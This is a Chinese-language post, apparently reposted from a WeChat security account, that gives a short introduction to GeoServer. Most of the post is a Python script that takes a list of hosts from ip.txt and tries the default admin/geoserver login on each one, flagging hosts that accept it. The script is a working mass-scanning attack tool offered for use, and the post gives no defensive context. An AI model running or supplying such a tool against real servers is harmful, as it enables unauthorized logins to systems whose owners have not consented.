什么是GeoServer

GeoServer是一个使用Java编写的，允许用户分享、编辑地理空间数据的开源软件。它在设计时就考虑了互操作性，其支持使用开放标准发布多数主流格式的空间数据。

作为一个社区驱动的项目，GeoServer由来自世界各地的个人和组织开发、测试，以及提供支持。

批量获取弱口令

同目录下用 ip.txt 存放需要批处理的url

工具代码：

import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit(target):
    url = target + "/geoserver/j_spring_security_check"

    header = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = "username=admin&password=geoserver"

    try:
        session = requests.session()
        res = session.post(url=url, headers=header, data=data, verify=False, timeout=3)
        if "注销" in res.text:
            print("[+]发现默认口令 admin/geoserver: " + target)
    except:
        pass


with open("ip.txt", 'r', encoding='utf-8') as f:
    l = f.readlines()
    for i in l:
        i = i.strip()
        if "http://" not in i and "https://" not in i:
            i = "http://" + i
            exploit(i)
        else:
            exploit(i)

原文始发于微信公众号（CatalyzeSec）：GeoServer批量获取弱口令工具